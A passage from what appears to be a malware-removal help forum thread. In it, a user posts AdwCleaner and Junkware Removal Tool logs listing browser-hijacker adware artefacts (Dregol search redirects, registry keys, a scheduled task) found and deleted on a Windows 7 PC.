E&cr=601187289&ir=

-\\ Chromium v


*************************

AdwCleaner[R0].txt - [6497 bytes] - [16/07/2015 18:11:54]
AdwCleaner[S0].txt - [5928 bytes] - [16/07/2015 18:15:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [5987 bytes] ##########
# AdwCleaner v4.208 - Logfile created 18/07/2015 at 12:07:29
# Updated 09/07/2015 by Xplode
# Database : 2015-07-15.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : J. Powers - DEMON-PC
# Running from : C:\Users\J. Powers\Downloads\adwcleaner_4.208.exe
# Option : Cleaning

***** [ Services ] *****

[#] Service Deleted : mcaudrv_simple
[#] Service Deleted : ManyCam

***** [ Files / Folders ] *****

File Deleted : C:\Windows\System32\drivers\mcaudrv_x64.sys

***** [ Scheduled tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}
Key Deleted : HKCU\Software\APN PIP
Key Deleted : HKCU\Software\usyndication.com
Key Deleted : HKCU\Software\USyndication
Key Deleted : HKLM\SOFTWARE\PIP

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17909


-\\ Mozilla Firefox v38.0.5 (x86 en-US)


-\\ Google Chrome v43.0.2357.134

[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Homepage] : hxxp://www.dregol.com/?f=1&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Startup_URLs] : hxxp://us.yhs4.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_ir_15_25&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByD0C0CyEtA0BtAtGyDtCyDyEtG0E0CyE0CtGtC0ByB0FtGyEtC0AyCyCzzzz0AtBtByEtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCzytCtBtAyDzztBtG0B0E0E0FtGyEtCtDyBtG0B0E0FyEtG0FtA0EyByDzzzy0FyC0F0EyC2QtN0A0LzuyE%26cr%3D997119123%26a%3Dwny_ir_15_25%26os%3DWindows 7 Home Premium

-\\ Chromium v


*************************

AdwCleaner[R0].txt - [9101 bytes] - [16/07/2015 18:11:54]
AdwCleaner[S0].txt - [8438 bytes] - [16/07/2015 18:15:45]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8497 bytes] ##########

 

[Domo124]

And R(0):

# AdwCleaner v4.208 - Logfile created 16/07/2015 at 18:11:54
# Updated 09/07/2015 by Xplode
# Database : 2015-07-15.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : J. Powers - DEMON-PC
# Running from : C:\Users\J. Powers\Downloads\adwcleaner_4.208.exe
# Option : Scan

***** [ Services ] *****

Service Found : mcaudrv_simple
Service Found : ManyCam
Service Found : csfd_1_10_0_17

***** [ Files / Folders ] *****

File Found : C:\END
File Found : C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ihokndmjeombjojnfkmapfnjeghjohim_0.localstorage
File Found : C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\searchplugins\search-provided-by-yahoo.xml
File Found : C:\Windows\System32\drivers\mcaudrv_x64.sys
Folder Found : C:\Program Files (x86)\LyricSing
Folder Found : C:\Program Files (x86)\Run_Dregol
Folder Found : C:\ProgramData\StarApp
Folder Found : C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Folder Found : C:\Users\J. Powers\AppData\Local\PackageAware
Folder Found : C:\Users\J. Powers\AppData\Roaming\Run_Dregol

***** [ Scheduled tasks ] *****

Task Found : Run_Dregol

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{29E17992-E3A4-40E4-A255-D85843B37E03}
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{c9ab6446-7efc-47fe-966c-dc54324eff9f}
Key Found : HKCU\Software\PRODUCTSETUP
Key Found : HKCU\Software\Run_Dregol
Key Found : HKCU\Software\USyndication
Key Found : HKCU\Software\usyndication.com
Key Found : [x64] HKCU\Software\APN PIP
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{29E17992-E3A4-40E4-A255-D85843B37E03}
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{c9ab6446-7efc-47fe-966c-dc54324eff9f}
Key Found : [x64] HKCU\Software\PRODUCTSETUP
Key Found : [x64] HKCU\Software\Run_Dregol
Key Found : [x64] HKCU\Software\USyndication
Key Found : [x64] HKCU\Software\usyndication.com
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\lrcsing@DNMard.net
Key Found : HKLM\SOFTWARE\PIP
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}
Key Found : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17909


-\\ Mozilla Firefox v39.0 (x86 en-US)


-\\ Google Chrome v43.0.2357.134

[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://us.yhs4.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_ir_15_25&param1=1&param2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByD0C0CyEtA0BtAtGyDtCyDyEtG0E0CyE0CtGtC0ByB0FtGyEtC0AyCyCzzzz0AtBtByEtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCzytCtBtAyDzztBtG0B0E0E0FtGyEtCtDyBtG0B0E0FyEtG0FtA0EyByDzzzy0FyC0F0EyC2QtN0A0LzuyE%26cr%3D997119123%26a%3Dwny_ir_15_25%26os%3DWindows 7 Home Premium&p={searchTerms}
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web data] - Found [Search Provider] : hxxp://www.dregol.com/results.php?f=4&q={searchTerms}&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Found [Homepage] : hxxp://www.dregol.com/?f=1&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Found [Startup_URLs] : B86EDAD82CC65EF8C6B5622AEB02CB6E8DB52B4241B0799F951A100803C9DF73"},"software_reporter":{"prompt_reason":"934E36FC82C7BDE42E031968D6EBD74CADAF83648B8B44757127CACB376E7FEB","prompt_seed":"68DB522F6D2437BD3735F293C3E9130D6260624F55B8F37CA0F19FB36826DAAA","prompt_version":"BE339162B0E946D0CC6D8993FF3638FA3CCF01AFE7C6AD9FCECFCB7E0502D658"},"sync":{"remaining_rollback_tries":"BA13BE78AB89D0AB725521E18D0F96AA7C6198AB8735A76EB0FC87BB7400D3CC"}},"super_mac":"84EF3A6D98210248B5E7394C2AE336AA742F9137BCA86E28D9957A67D678CD22"},"session":{"restore_on_startup":4,"startup_urls":["hxxp://www.dregol.com/?f=7&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=

-\\ Chromium v


*************************

AdwCleaner[R0].txt - [6315 bytes] - [16/07/2015 18:11:54]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [6374 bytes] ##########
# AdwCleaner v4.208 - Logfile created 18/07/2015 at 12:05:23
# Updated 09/07/2015 by Xplode
# Database : 2015-07-15.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : J. Powers - DEMON-PC
# Running from : C:\Users\J. Powers\Downloads\adwcleaner_4.208.exe
# Option : Scan

***** [ Services ] *****

Service Found : mcaudrv_simple
Service Found : ManyCam

***** [ Files / Folders ] *****

File Found : C:\Windows\System32\drivers\mcaudrv_x64.sys

***** [ Scheduled tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\USyndication
Key Found : HKCU\Software\usyndication.com
Key Found : [x64] HKCU\Software\APN PIP
Key Found : [x64] HKCU\Software\USyndication
Key Found : [x64] HKCU\Software\usyndication.com
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Found : HKLM\SOFTWARE\PIP
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17909


-\\ Mozilla Firefox v38.0.5 (x86 en-US)


-\\ Google Chrome v43.0.2357.134

[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Found [Homepage] : hxxp://www.dregol.com/?f=1&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Found [Startup_URLs] : hxxp://us.yhs4.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_ir_15_25&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByD0C0CyEtA0BtAtGyDtCyDyEtG0E0CyE0CtGtC0ByB0FtGyEtC0AyCyCzzzz0AtBtByEtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCzytCtBtAyDzztBtG0B0E0E0FtGyEtCtDyBtG0B0E0FyEtG0FtA0EyByDzzzy0FyC0F0EyC2QtN0A0LzuyE%26cr%3D997119123%26a%3Dwny_ir_15_25%26os%3DWindows 7 Home Premium

-\\ Chromium v


*************************

AdwCleaner[R0].txt - [8888 bytes] - [16/07/2015 18:11:54]
AdwCleaner[S0].txt - [6079 bytes] - [16/07/2015 18:15:45]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [9006 bytes] ##########

 

[Domo124]

Looks like rogue killer successfully got rid ofthe malware, but bites removed 90 files that it considered dangerous. Thanks so much for the help, and here is the last log:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 7.5.1 (07.16.2015:1)
OS: Windows 7 Home Premium x64
Ran by J. Powers on Sat 07/18/2015 at 12:58:12.31
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Tasks



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{42740267-7172-4304-B00A-DC95DDB739FD}



~~~ Files



~~~ Folders

Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{00287ED8-A0A8-44BD-B9E0-D8D81A3B55B3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{015AB5AC-753E-4A69-868C-F04C7FFEB0B3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{029931E8-8ACB-4062-A007-AE77DC5C0741}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{031EB715-1DFF-42D3-93E4-92F9A31110D1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{037F7055-9EDC-4C84-875B-796ADF04AAC9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{04A80E2E-AB7B-400F-BBC0-38C8917DA9DD}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{05F406EB-C3FD-44A0-9D5E-88E324B51AB7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{06215D26-69FB-4A6C-A79B-C737C487FCC1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{09685AA1-F431-496F-9F6E-902281B980BE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{09ADBF25-C7BA-4C7C-AE7D-AA4A66815EE6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0B880720-CD34-4AAE-B9E2-65E65A2F79EE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0C19D082-E547-4E83-BC6B-5B336B869CF3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0C866D2E-5588-4B23-89B1-FDECF971005C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0DC70685-EC7B-4374-A1A1-CE7BD85CA8F0}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0DCBF104-05B3-4111-8ECE-FABD072E580C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0E55343B-8A1E-444C-A080-2B5908C39398}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0EEC47FE-7055-4ADB-B3B1-430C9F8A537A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0EF48D09-B00B-4518-A264-564F74C9C2D2}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0F70B87F-C21F-4D29-B8D1-6DEAC5137EB8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{0FB16A0A-7FB6-4CEA-AEC5-044A9A6E1591}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1035CB3F-224F-45C4-9E16-C026C0F1D295}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{104E6496-CC9A-4F87-81C2-1BB524C85D90}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1056A6C7-2FB2-41C0-9748-53E6527FC938}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1070A0BC-DE93-4B44-949F-F44E1F597B1E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1099B80E-8275-41A1-AA68-1E32D2D23839}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1104B266-5825-4559-8153-95DA0704D626}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1112106C-65CC-4F39-A371-890F220CFC25}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{11147467-5944-48CA-906C-DE97EA19ED05}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{11C92FB4-2715-48DB-85F9-F7E196990E87}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{11F0E80D-1BEF-4C20-91CA-4BC9C5B36481}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{12CEAFB2-3C98-4449-9CFC-A4E732EADF0F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{13CA47B4-9FDB-4DC0-82DF-8E1B4592DF50}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{13D63E43-48B1-439D-91D2-CFBB2663DB8D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{14A67EA2-E568-4ABF-8923-D8BA3C7F87EE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{15008443-9740-4B26-8AB3-50FF851EF193}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{150B2EF2-29C3-41DE-90B8-77BD986E0855}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{15B1A435-F522-4163-B969-9504D56C5B16}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{173D7771-6D74-4D49-998E-A28ACC61BA08}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{17C1E6B4-03E0-4B71-A0B3-F15F82F1C0F6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{180D2AAD-83A7-4783-8D7E-EE07DC8C6730}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1A82E40A-C26A-4DC8-975B-A3D4D584AD3B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1B87DF06-876D-4C87-8990-22A9307C3B95}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1C00D53B-C209-4013-9F7B-0B93EAE80CE6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1C664C53-25E5-4F00-8463-FC1D7861E360}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1D9C19B4-8CA6-4383-8E8A-1E1712DA58BE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1DF0F30D-5EF2-4D6C-96E5-FF09B66AE5C7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1E033EBF-8577-4732-856E-3C8CCD0D18D7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1E653DCA-4694-4AB6-B0D5-9B09F2C1B1C7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1E9A4E28-217A-4EFF-A9C5-A914BC63582B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1F56171B-CFB1-4A76-B68D-26FB40FFBDDB}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{1F616A0B-1943-4802-8591-2EC147BA9645}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2053A0ED-5D23-4DB9-9812-9FD75984370E}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{20A77088-6F2D-4CDB-930D-563F559D0A24}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{20E9C59E-E789-47B8-A78B-163F414806CA}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2124E9D1-48A4-4D7B-A137-508F436B95EE}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{212F88CF-ACFE-41C1-86B5-C931BEE07E81}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2181F1FE-6374-4890-A81F-28129132A18A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{21AD6341-6391-4315-884A-59A9D1CC057D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{21ADB940-DF41-4039-B46C-DE329B564207}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{22880A99-240B-457C-80ED-546BECBB86E5}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{22BE0888-464B-4EDD-A5A5-09176449AF1F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{22BF7FB6-C70C-4C92-9C0C-57140A27D99B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2324AC49-8CEE-4967-B186-508C9398B9E0}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{23A4913E-18E5-4A18-866F-8784176DDF4C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{240F0CAB-63E6-4816-AA32-31D75543C170}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{244D21FA-B292-4A19-9B68-D4F03C56CC40}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{24EBC2C2-F8AF-4440-8FFC-283D51D3111D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2526A627-9AB1-4FBD-9690-80E0D14D30A7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2528F4CE-6D24-40EC-8846-DA1E43F64AE9}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{25AA7316-42DC-40FD-AAF5-2F728848CDF0}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{263D9D25-A065-4956-B3D3-A568F96FA91D}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2689FC55-4B0D-4E75-930E-77740DDF60E8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{26EF090E-3539-43F3-AEE6-BDED813A5F24}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2885D6AC-A45F-4674-A2B9-4C60B0F56953}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2981A1E3-C411-448A-86D5-BB080846E249}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2AA22FD5-09A7-4C63-B9A8-02FE82A10DE3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2B54A61D-2477-4DBB-802D-D196EDAEB2D8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2C26D992-67C9-4426-8495-208BA53FDA22}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2D816129-BB8A-4C41-ABEA-514D43C6DDE7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{2EEC5FBD-DCC8-499E-A0A1-39E73085CC2A}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{30891476-30C3-466F-BA75-9447F8220202}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{315F0352-97E0-477F-AB65-CA283D81ABE1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3177D52A-EDBE-464C-A1DC-AEA51A16BA4F}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{33397067-5532-480B-8CCC-1E795C067759}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{335FB040-3193-43C4-B331-6357BE9243AA}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{33674561-37ED-4B35-B919-24DA62DEA3D1}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{34042994-E57E-4DA6-8B5E-86A1BDCF0599}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{34A8ACB8-BBB2-4A9F-9A94-2FFFDA584120}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{34AD84AD-998A-4461-A984-98F80A8F88E7}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{35D43479-62EE-4689-8286-947B979BABC5}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{366CD8EA-9D2F-4CDA-BFFD-092280D3C9B6}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{375B44CF-0831-4269-A088-440CEBA57E1B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{37780876-1DBA-42DC-9A62-02AB4190CA17}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{379A0AB6-0141-4876-B4DE-7A1BC688B0A3}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{37B247DA-BD11-4FA6-93B6-42B34ED3E26B}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{37D78E22-36BE-4172-9008-3E06214CDD29}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{37FD9B47-1AD4-40E6-8059-32C35F60F4C8}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{37FE7B4B-D765-4212-AD61-4290FC02ABEC}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{385380C9-3665-4584-A611-DF9F411B69C4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{38790A58-342B-4246-8CB1-1C198992F4DD}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3A0BEB4E-E5EC-4B1C-9BE9-ED614155C2C4}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3A6EEC2F-900E-4205-A9B6-291C9CAA3E6C}
Successfully deleted: [Empty Folder] C:\Users\J. Powers\Appdata\Local\{3B288802-0E93-417C-B40E-593CF62CA14C}
